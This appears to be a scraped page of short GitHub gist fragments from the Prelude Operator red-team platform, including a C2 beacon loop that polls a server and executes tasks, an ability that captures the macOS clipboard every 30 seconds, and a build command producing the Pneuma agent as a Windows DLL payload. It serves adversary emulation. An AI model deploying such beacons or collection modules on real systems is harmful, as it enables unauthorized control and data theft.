This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<div id="plugin-header" class="profile-heading-container"> | |
<div class="body"> | |
<strong class="profile-heading">Initial access on Azure resources</strong> | |
<p> | |
Use Operator to get initial access on your Azure deployed resources. This will allow you deploy Pneuma (or PneumaEX for professional license holders) onto | |
virtual machines running in Resource Groups on Microsoft Azure. | |
</p> | |
</div> | |
</div> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"Version": "2012-10-17", | |
"Statement": [ | |
{ | |
"Effect": "Allow", | |
"Action": [ | |
"ec2:AuthorizeSecurityGroupIngress", | |
"ec2:DescribeAddresses", | |
"ec2:DescribeImages", | |
"ec2:DescribeInstances", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
if (task[0] === 'api') { | |
if (task[2]) { | |
try { | |
task[2] = JSON.parse(task[2]); | |
} catch (e) { | |
throw new Error("Could not parse module params: "+e.toString()); | |
} | |
} | |
return runModule(task[0], task[1], task[2] || null); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function run(argv) { | |
beacon = new Beacon((argv.length > 0) ? (argv[0] || argv) : 'http://localhost:3391', (argv.length > 1) ? argv[1] : 'http'); | |
while (true) { | |
try { | |
let tasks = runModule('c2', beacon.contact, {beacon: beacon}); | |
beacon.Links = tasks.map(task => executeTask(Object.assign(new Instruction(), task, {Pid: beacon.pid}))); | |
} catch (e) { | |
console.log(`Beacon failed. ${e}`) | |
} | |
console.log(`Sleeping for ${beacon.Sleep} seconds`); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package commands | |
import ( | |
"encoding/json" | |
"log" | |
"os" | |
"syscall" | |
"unsafe" | |
) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
platforms: | |
windows: | |
keyword: | |
command: api.ps |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
platforms: | |
darwin: | |
keyword: | |
command: collect.captureClipboard |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
id: 2897b095-3356-456f-876c-3103f91352ab | |
metadata: | |
version: 1 | |
authors: | |
- khyberspache | |
tags: | |
- thinktank | |
name: Capture clipboard using a module | |
description: | | |
Installs a user-land clipboard capture binary and collects the clipboard every 30 seconds for 10 minutes. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
GOOS=windows CC=x86_64-w64-mingw32-gcc CGO_ENABLED=1 go build --buildmode=c-shared --ldflags='-s -w -X main.key="MYKEYISBESTKEY" -extldflags "-Wl,--nxcompat -Wl,--dynamicbase -Wl,--high-entropy-va"' -o payloads/pneuma.dll main.go; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//+build cgo | |
package main | |
import "C" | |
import ( | |
"flag" | |
"github.com/preludeorg/pneuma/sockets" | |
"github.com/preludeorg/pneuma/util" | |
"log" |
NewerOlder